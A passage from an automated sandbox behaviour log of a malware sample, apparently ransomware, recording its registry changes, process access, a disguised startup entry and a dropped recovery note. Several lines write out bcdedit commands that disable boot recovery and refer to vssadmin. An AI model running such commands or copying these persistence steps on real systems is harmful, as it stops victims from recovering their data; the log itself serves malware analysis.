  8361. C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EXE
  8362.     828      
  8363. File   
  8364. Failed
  8365.    
  8366. C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EX
  8367.    E
  8368.     828      
  8369. File   
  8370. Failed
  8371.    
  8372. C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAIL
  8373.    URES.EXE
  8374.     828      
  8375. File   
  8376. Failed
  8377.    
  8378. C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOR
  8379.    EALLFAILURES.EXE
  8380.     828      
  8381. File   
  8382. Failed
  8383.    
  8384. C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
  8385.     828      
  8386. File   
  8387. Failed
  8388.    
  8389. C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} recoveryenabled.exe
  8390.     828      
  8391. File   
  8392. Failed
  8393.    
  8394. C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
  8395.     828      
  8396. File   
  8397. Failed
  8398.    
  8399. C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
  8400.     828      
  8401. File   
  8402. Failed
  8403.    
  8404. C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
  8405.     828      
  8406. File   
  8407. Failed
  8408.    
  8409. C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
  8410.     828      
  8411. File   
  8412. Failed
  8413.    
  8414. C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
  8415.     828      
  8416. File   
  8417. Failed
  8418.    
  8419. C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
  8420.     828      
  8421. File   
  8422. Failed
  8423.    
  8424. C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED.EXE
  8425.     828      
  8426. File   
  8427. Failed
  8428.    
  8429. C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
  8430.     828      
  8431. File   
  8432. Failed
  8433.    
  8434. C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} recoveryenabled off.exe
  8435.     828      
  8436. File   
  8437. Failed
  8438.    
  8439. C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
  8440.     828      
  8441. File   
  8442. Failed
  8443.    
  8444. C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
  8445.     828      
  8446. File   
  8447. Failed
  8448.    
  8449. C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
  8450.     828      
  8451. File   
  8452. Failed
  8453.    
  8454. C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
  8455.     828      
  8456. File   
  8457. Failed
  8458.    
  8459. C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
  8460.     828      
  8461. File   
  8462. Failed
  8463.    
  8464. C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EXE
  8465.     828      
  8466. File   
  8467. Failed
  8468.    
  8469. C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} RECOVERYENABLED OFF.EX
  8470.    E
  8471.     828      
  8472. API Call   
  8473.    
  8474.   API Name:  ProcessCreate_Failure   Address:  0x7c81d627
  8475.   Params:  [NULL, bcdedit.exe /set {current} recoveryenabled off, 32, NULL]
  8476.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  dummy.dll
  8477.     828      
  8478. API Call   
  8479.    
  8480.   API Name:  Sleep   Address:  0x0041df48
  8481.   Params:  [1000]
  8482.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  8483.     828      
  8484. Regkey 
  8485. Added
  8486.    
  8487. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\zsys\
  8488.     828      
  8489. File   
  8490. Failed
  8491.    
  8492. C:\Documents and Settings\admin\Application Data\NETAPI32.DLL
  8493.     828      
  8494. API Call   
  8495.    
  8496.   API Name:  CryptAcquireContextW   Address:  0x0041baf8
  8497.   Params:  [NULL, NULL, 1, 4026531840]
  8498.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  advapi32.dll
  8499.     828      
  8500. File   
  8501. Failed
  8502.    
  8503. C:\Documents and Settings\admin\Application Data\rsaenh.dll
  8504.     828      
  8505. File   
  8506. Failed
  8507.    
  8508. C:\DOCUME~1\admin\LOCALS~1\Temp\rsaenh.dll
  8509.     828      
  8510. File   
  8511. Failed
  8512.    
  8513. C:\Documents and Settings\admin\Application Data\crypt32.dll
  8514.     828      
  8515. API Call   
  8516.    
  8517.   API Name:  CryptAcquireContextW   Address:  0x0041bb4c
  8518.   Params:  [NULL, Intel Hardware Cryptographic Service Provider, 22, 0]
  8519.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  advapi32.dll
  8520.     828      
  8521. API Call   
  8522.    
  8523.   API Name:  Process32First   Address:  0x0041bda4
  8524.   Params:  [0x1d4, 0x12d488]
  8525.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  8526.     828      
  8527. Malicious  Alert   
  8528. Generic  Anomalous  Activity
  8529.    
  8530. Message:   Enumerating running processes    Detail:   Process is enumerating running processes  
  8531.              
  8532. Regkey 
  8533. Setval
  8534.    
  8535. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\zsys\"ID" = 93 dc 43 d8 a6 62 c
  8536.   9 f2
  8537.     828      
  8538. Regkey 
  8539. Added
  8540.    
  8541. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\93DC43D8A662C9F2
  8542.     828      
  8543. Regkey 
  8544. Setval
  8545.    
  8546. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\93DC43D8A662C9F2\"data" = 31 4c
  8547.     64 52 4b 70 31 67 63 48 4c 47 67 6b 58 34 6f 33 64 6b 59 66 57 68 38 4d 6e 79 46 52 4a 33 77 38
  8548.    00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 d5 ea aa e5 0e 4b 19 24 b8 03 93 90 cb 11 2f aa 98 9
  8549.    6 6f c0 87 32 a7 bb 69 92 e4 54 be 10 a5 c9 61 23 a5 8f 1d 4d cc bc d7 d6 b1 01 26 14 8f c2 8e fd
  8550.     1d 43 21 51 7c ba 81 af 47 f0 92 aa 40 0f 00 00 35 32 39 37 37 36 31 35 42 34 38 45 46 42 39 35
  8551.    45 38 31 35 32 34 33 37 44 30 30 46 34 37 36 35 30 30 33 38 43 45 41 37 31 38 34 37 37 43 30 39 3
  8552.    8 46 31 43 41 34 46 44 33 30 36 45 33 31 43 45 46 35 45 46 30 39 31 35 35 38 36 35 33 42 33 35 37
  8553.     32 44 46 43 33 44 42 45 31 45 34 46 45 46 33 44 32 31 34 38 33 30 38 38 44 34 34 36 33 33 39 36
  8554.    33 30 34 36 43 35 38 36 31 31 45 38 34 31 33 00 00 00 00 04 86 87 1a 27 46 b0 11 1d 8d d4 bc aa 6
  8555.    7 a5 db 04 0f 61 63 07 31 36 b9 c8 28 0f a6 7e 38 a8 49 d8 01 ca c2 d9 26 94 4f cb 47 37 aa a7 92
  8556.     d5 19 b5 28 a8 66 90 66 9e bd dd 6a 61 92 b0 52 a5 73 e2 00 00 00 00 00 00 00 00 d3 4d 61 56 00
  8557.    00 00 00
  8558.     828      
  8559. Regkey 
  8560. Added
  8561.    
  8562. \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
  8563.     828      
  8564. Regkey 
  8565. Setval
  8566.    
  8567. \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\"EnableLinkedConnections
  8568.    " = 0x00000001
  8569.     828      
  8570. Malicious  Alert   
  8571. Misc  Anom
  8572.    
  8573. Message:   Process deleting itself    Detail:   Process deleting itself in any manor  
  8574.              
  8575. Regkey 
  8576. Added
  8577.    
  8578. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  8579.   n\Run
  8580.     828      
  8581. Regkey 
  8582. Setval
  8583.    
  8584. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  8585.   n\Run\"Acronis" = C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  8586.     828      
  8587. Malicious  Alert   
  8588. Suspicious  Persistance  Activity
  8589.    
  8590. Message:   Startup services added for file in suspicious folder    Detail:   Process adding itself (non-DLL) to windows startup areas for file in suspicious folder  
  8591.              
  8592. Malicious  Alert   
  8593. Misc  Anom
  8594.    
  8595. Message:   Suspicious Persistence Activity    Detail:   Suspicious Persistence Activity  
  8596.              
  8597. API Call   
  8598.    
  8599.   API Name:  CryptAcquireContextA   Address:  0x00412c1f
  8600.   Params:  [NULL, NULL, 1, 4026531840]
  8601.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  advapi32.dll
  8602.     828      
  8603. API Call   
  8604.    
  8605.   API Name:  SetWindowsHookExA   Address:  0x7473097c
  8606.   Params:  [2, 0x747307c3, 0x74720000, 1248]
  8607.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  user32.dll
  8608.     828      
  8609. API Call   
  8610.    
  8611.   API Name:  SetWindowsHookExA   Address:  0x7473099a
  8612.   Params:  [7, 0x747304cd, 0x74720000, 1248]
  8613.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  user32.dll
  8614.     828      
  8615. File   
  8616. Failed
  8617.    
  8618. C:\DOCUME~1\admin\LOCALS~1\Temp\vssadmin.exe
  8619.     828      
  8620. Regkey 
  8621. Added
  8622.    
  8623. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  8624.    n\Explorer
  8625.     828      
  8626. Regkey 
  8627. Added
  8628.    
  8629. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  8630.    n\Explorer\SessionInfo\00000000000096c5
  8631.     828      
  8632. API Call   
  8633.    
  8634.   API Name:  CryptAcquireContextA   Address:  0x00412c1f
  8635.   Params:  [NULL, NULL, 1, 4026531840]
  8636.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  advapi32.dll
  8637.     828      
  8638. API Call   
  8639.    
  8640.   API Name:  CryptAcquireContextA   Address:  0x00412c1f
  8641.   Params:  [NULL, NULL, 1, 4026531840]
  8642.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  advapi32.dll
  8643.     828      
  8644. 15 Repeated items skipped
  8645. Regkey 
  8646. Added
  8647.    
  8648. \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
  8649.     828      
  8650. Regkey 
  8651. Added
  8652.    
  8653. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  8654.    n\Shell Extensions\Blocked
  8655.     828      
  8656. Regkey 
  8657. Added
  8658.    
  8659. \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
  8660.     828      
  8661. Regkey 
  8662. Added
  8663.    
  8664. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  8665.    n\Shell Extensions\Cached
  8666.     828      
  8667. API Call   
  8668.    
  8669.   API Name:  CryptAcquireContextA   Address:  0x00412c1f
  8670.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  advapi32.dll
  8671.     828      
  8672. API Call   
  8673.    
  8674.   API Name:  CryptAcquireContextA   Address:  0x00412c1f
  8675.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  advapi32.dll
  8676.     828      
  8677. 9 Repeated items skipped
  8678. File   
  8679. Created
  8680.    
  8681. C:\Documents and Settings\admin\My Documents\recover_file_mlybivbbx.txt
  8682.     828      
  8683. File   
  8684. Close
  8685.    
  8686. C:\Documents and Settings\admin\My Documents\recover_file_mlybivbbx.txt
  8687.   MD5:  68762e4c1ea6cb0f69be439806dddb61
  8688.   SHA1: 226922713f62c2df0d0dc38705e51479861ae10a
  8689.     828     254
  8690. Process
  8691. Opened
  8692.    
  8693.  
  8694. Target:   System    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8695.    
  8696. 4
  8697. 828
  8698.          
  8699. Process
  8700. Opened
  8701.    
  8702.  
  8703. Target:   C:\WINDOWS\system32\smss.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8704.    
  8705. 316
  8706. 828
  8707.          
  8708. Process
  8709. Opened
  8710.    
  8711.  
  8712. Target:   C:\WINDOWS\system32\csrss.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8713.    
  8714. 420
  8715. 828
  8716.          
  8717. Process
  8718. Opened
  8719.    
  8720.  
  8721. Target:   C:\WINDOWS\system32\winlogon.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8722.    
  8723. 444
  8724. 828
  8725.          
  8726. API Call   
  8727.    
  8728.   API Name:  Sleep   Address:  0x0041f00b
  8729.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  8730.     828      
  8731. API Call   
  8732.    
  8733.   API Name:  GetSystemDirectoryW   Address:  0x77f78688
  8734.   Params:  [0x113e938, 260]
  8735.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  8736.     828      
  8737. Process
  8738. Opened
  8739.    
  8740.  
  8741. Target:   C:\WINDOWS\system32\services.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8742.    
  8743. 552
  8744. 828
  8745.          
  8746. Process
  8747. Opened
  8748.    
  8749.  
  8750. Target:   C:\WINDOWS\system32\lsass.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8751.    
  8752. 564
  8753. 828
  8754.          
  8755. Process
  8756. Opened
  8757.    
  8758.  
  8759. Target:   C:\WINDOWS\system32\svchost.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8760.    
  8761. 716
  8762. 828
  8763.          
  8764. Process
  8765. Opened
  8766.    
  8767.  
  8768. Target:   C:\WINDOWS\system32\svchost.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8769.    
  8770. 776
  8771. 828
  8772.          
  8773. Process
  8774. Opened
  8775.    
  8776.  
  8777. Target:   C:\WINDOWS\system32\svchost.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8778.    
  8779. 840
  8780. 828
  8781.          
  8782. Process
  8783. Opened
  8784.    
  8785.  
  8786. Target:   C:\WINDOWS\system32\svchost.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8787.    
  8788. 892
  8789. 828
  8790.          
  8791. Process
  8792. Opened
  8793.    
  8794.  
  8795. Target:   C:\WINDOWS\system32\spoolsv.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8796.    
  8797. 1164
  8798. 828
  8799.          
  8800. Process
  8801. Opened
  8802.    
  8803.  
  8804. Target:   C:\WINDOWS\system32\alg.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8805.    
  8806. 1800
  8807. 828
  8808.          
  8809. Process
  8810. Opened
  8811.    
  8812.  
  8813. Target:   C:\WINDOWS\system32\wscntfy.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8814.    
  8815. 1864
  8816. 828
  8817.          
  8818. Process
  8819. Opened
  8820.    
  8821.  
  8822. Target:   C:\Program Files\Messenger\msmsgs.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8823.    
  8824. 1900
  8825. 828
  8826.          
  8827. Process
  8828. Opened
  8829.    
  8830.  
  8831. Target:   C:\WINDOWS\system32\ctfmon.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8832.    
  8833. 1924
  8834. 828
  8835.          
  8836. Process
  8837. Opened
  8838.    
  8839.  
  8840. Target:   C:\WINDOWS\explorer.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8841.    
  8842. 2684
  8843. 828
  8844.          
  8845. Process
  8846. Opened
  8847.    
  8848.  
  8849. Target:   C:\Program Files\Internet Explorer\iexplore.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8850.    
  8851. 2768
  8852. 828
  8853.          
  8854. Process
  8855. Opened
  8856.    
  8857.  
  8858. Target:   C:\Program Files\Internet Explorer\iexplore.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8859.    
  8860. 3048
  8861. 828
  8862.          
  8863. Process
  8864. Opened
  8865.    
  8866.  
  8867. Target:   C:\Program Files\Internet Explorer7\iexplore.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8868.    
  8869. 3132
  8870. 828
  8871.          
  8872. Process
  8873. Opened
  8874.    
  8875.  
  8876. Target:   C:\Program Files\Internet Explorer6\IEXPLORE.EXE    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8877.    
  8878. 3184
  8879. 828
  8880.          
  8881. Process
  8882. Opened
  8883.    
  8884.  
  8885. Target:   C:\WINDOWS\system32\wbem\wmiprvse.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8886.    
  8887. 908
  8888. 828
  8889.          
  8890. Regkey 
  8891. Added
  8892.    
  8893. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  8894.    n\Explorer\Shell Folders
  8895.     828      
  8896. Regkey 
  8897. Setval
  8898.    
  8899. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  8900.    n\Explorer\Shell Folders\"Cache" = C:\Documents and Settings\admin\Local Settings\Temporary Inter
  8901.   net Files
  8902.     828      
  8903. Mutex  
  8904.    
  8905. \BaseNamedObjects\ZonesCounterMutex
  8906.     828      
  8907. Mutex  
  8908.    
  8909. \BaseNamedObjects\ZoneAttributeCacheCounterMutex
  8910.     828      
  8911. Mutex  
  8912.    
  8913. \BaseNamedObjects\ZonesCacheCounterMutex
  8914.     828      
  8915. Regkey 
  8916. Setval
  8917.    
  8918. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  8919.   n\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001
  8920.     828      
  8921. Regkey 
  8922. Setval
  8923.    
  8924. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  8925.    n\Internet Settings\ZoneMap\"IntranetName" = 0x00000001
  8926.     828      
  8927. Regkey 
  8928. Setval
  8929.    
  8930. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  8931.   n\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001
  8932.     828      
  8933. Regkey 
  8934. Setval
  8935.    
  8936. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  8937.    n\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
  8938.     828      
  8939. Mutex  
  8940.    
  8941. \BaseNamedObjects\ZoneAttributeCacheCounterMutex
  8942.     828      
  8943. Mutex  
  8944.    
  8945. \BaseNamedObjects\ZonesLockedCacheCounterMutex
  8946.     828      
  8947. Regkey 
  8948. Setval
  8949.    
  8950. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  8951.   n\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001
  8952.     828      
  8953. Regkey 
  8954. Setval
  8955.    
  8956. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  8957.    n\Internet Settings\ZoneMap\"IntranetName" = 0x00000001
  8958.     828      
  8959. Regkey 
  8960. Setval
  8961.    
  8962. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  8963.   n\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001
  8964.     828      
  8965. Regkey 
  8966. Setval
  8967.    
  8968. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  8969.    n\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
  8970.     828      
  8971. Folder 
  8972. Hide
  8973.    
  8974. C:\Documents and Settings\admin\Local Settings\Temporary Internet Files
  8975.     828      
  8976. Folder 
  8977. Open
  8978.    
  8979. C:\Documents and Settings\admin\Cookies
  8980.     828      
  8981. Regkey 
  8982. Added
  8983.    
  8984. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  8985.   n\Explorer\Shell Folders
  8986.     828      
  8987. Regkey 
  8988. Setval
  8989.    
  8990. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  8991.   n\Explorer\Shell Folders\"Cookies" = C:\Documents and Settings\admin\Cookies
  8992.     828      
  8993. Process
  8994. Opened
  8995.    
  8996.  
  8997. Target:   System    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  8998.    
  8999. 4
  9000. 828
  9001.          
  9002. Process
  9003. Opened
  9004.    
  9005.  
  9006. Target:   C:\WINDOWS\system32\smss.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9007.    
  9008. 316
  9009. 828
  9010.          
  9011. Process
  9012. Opened
  9013.    
  9014.  
  9015. Target:   C:\WINDOWS\system32\csrss.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9016.    
  9017. 420
  9018. 828
  9019.          
  9020. Process
  9021. Opened
  9022.    
  9023.  
  9024. Target:   C:\WINDOWS\system32\winlogon.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9025.    
  9026. 444
  9027. 828
  9028.          
  9029. Process
  9030. Opened
  9031.    
  9032.  
  9033. Target:   C:\WINDOWS\system32\services.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9034.    
  9035. 552
  9036. 828
  9037.          
  9038. Process
  9039. Opened
  9040.    
  9041.  
  9042. Target:   C:\WINDOWS\system32\lsass.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9043.    
  9044. 564
  9045. 828
  9046.          
  9047. Process
  9048. Opened
  9049.    
  9050.  
  9051. Target:   C:\WINDOWS\system32\svchost.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9052.    
  9053. 716
  9054. 828
  9055.          
  9056. Process
  9057. Opened
  9058.    
  9059.  
  9060. Target:   C:\WINDOWS\system32\svchost.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9061.    
  9062. 776
  9063. 828
  9064.          
  9065. Process
  9066. Opened
  9067.    
  9068.  
  9069. Target:   C:\WINDOWS\system32\svchost.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9070.    
  9071. 840
  9072. 828
  9073.          
  9074. Process
  9075. Opened
  9076.    
  9077.  
  9078. Target:   C:\WINDOWS\system32\svchost.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9079.    
  9080. 892
  9081. 828
  9082.          
  9083. Process
  9084. Opened
  9085.    
  9086.  
  9087. Target:   C:\WINDOWS\system32\spoolsv.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9088.    
  9089. 1164
  9090. 828
  9091.          
  9092. Process
  9093. Opened
  9094.    
  9095.  
  9096. Target:   C:\WINDOWS\system32\alg.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9097.    
  9098. 1800
  9099. 828
  9100.          
  9101. Process
  9102. Opened
  9103.    
  9104.  
  9105. Target:   C:\WINDOWS\system32\wscntfy.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9106.    
  9107. 1864
  9108. 828
  9109.          
  9110. Process
  9111. Opened
  9112.    
  9113.  
  9114. Target:   C:\Program Files\Messenger\msmsgs.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9115.    
  9116. 1900
  9117. 828
  9118.          
  9119. Process
  9120. Opened
  9121.    
  9122.  
  9123. Target:   C:\WINDOWS\system32\ctfmon.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9124.    
  9125. 1924
  9126. 828
  9127.          
  9128. Process
  9129. Opened
  9130.    
  9131.  
  9132. Target:   C:\WINDOWS\explorer.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9133.    
  9134. 2684
  9135. 828
  9136.          
  9137. Process
  9138. Opened
  9139.    
  9140.  
  9141. Target:   C:\Program Files\Internet Explorer\iexplore.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9142.    
  9143. 2768
  9144. 828
  9145.          
  9146. Process
  9147. Opened
  9148.    
  9149.  
  9150. Target:   C:\Program Files\Internet Explorer\iexplore.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9151.    
  9152. 3048
  9153. 828
  9154.          
  9155. Process
  9156. Opened
  9157.    
  9158.  
  9159. Target:   C:\Program Files\Internet Explorer7\iexplore.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9160.    
  9161. 3132
  9162. 828
  9163.          
  9164. Process
  9165. Opened
  9166.    
  9167.  
  9168. Target:   C:\Program Files\Internet Explorer6\IEXPLORE.EXE    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9169.    
  9170. 3184
  9171. 828
  9172.          
  9173. Process
  9174. Opened
  9175.    
  9176.  
  9177. Target:   C:\WINDOWS\system32\wbem\wmiprvse.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  9178.    
  9179. 908
  9180. 828
  9181.          
  9182. Folder 
  9183. Hide
  9184.    
  9185. C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5
  9186.     828      
  9187. File   
  9188. Failed
  9189.    
  9190. C:\Documents and Settings\admin\Application Data\SETUPAPI.dll
  9191.     828      
  9192. API Call   
  9193.    
  9194.   API Name:  GetSystemDirectoryW   Address:  0x77927324
  9195.   Params:  [0x113dde8, 260]
  9196.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  9197.     828      
  9198. API Call   
  9199.    
  9200.   API Name:  GetComputerNameExW   Address:  0x77927048
  9201.   Params:  [0, 0x113de1c, 0x113de18]
  9202.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  9203.     828      
  9204. Regkey 
  9205. Queryvalue
  9206.    
  9207. \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
  9208.     828      
  9209. API Call   
  9210.    
  9211.  API Name:  GetComputerNameExW   Address:  0x779270ab
  9212.  Params:  [3, 0x113de1c, 0x113de18]
  9213.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  9214.     828      
  9215. Regkey 
  9216. Added
  9217.    
  9218. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  9219.   n\Explorer\Shell Folders
  9220.     828      
  9221. Regkey 
  9222. Setval
  9223.    
  9224. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  9225.   n\Explorer\Shell Folders\"History" = C:\Documents and Settings\admin\Local Settings\History
  9226.     828      
  9227. API Call   
  9228.    
  9229.   API Name:  GetVolumeNameForVolumeMountPointW   Address:  0x7ca3f17e
  9230.   Params:  [NULL, \\?\Volume{e319f02c-31a9-11e1-9a3f-806d6172696f}\]
  9231.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  9232.     828      
  9233. API Call   
  9234.    
  9235.   API Name:  GetVolumeNameForVolumeMountPointW   Address:  0x7ca3f17e
  9236.   Params:  [NULL, \\?\Volume{e319f02e-31a9-11e1-9a3f-806d6172696f}\]
  9237.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  9238.     828      
  9239. Regkey 
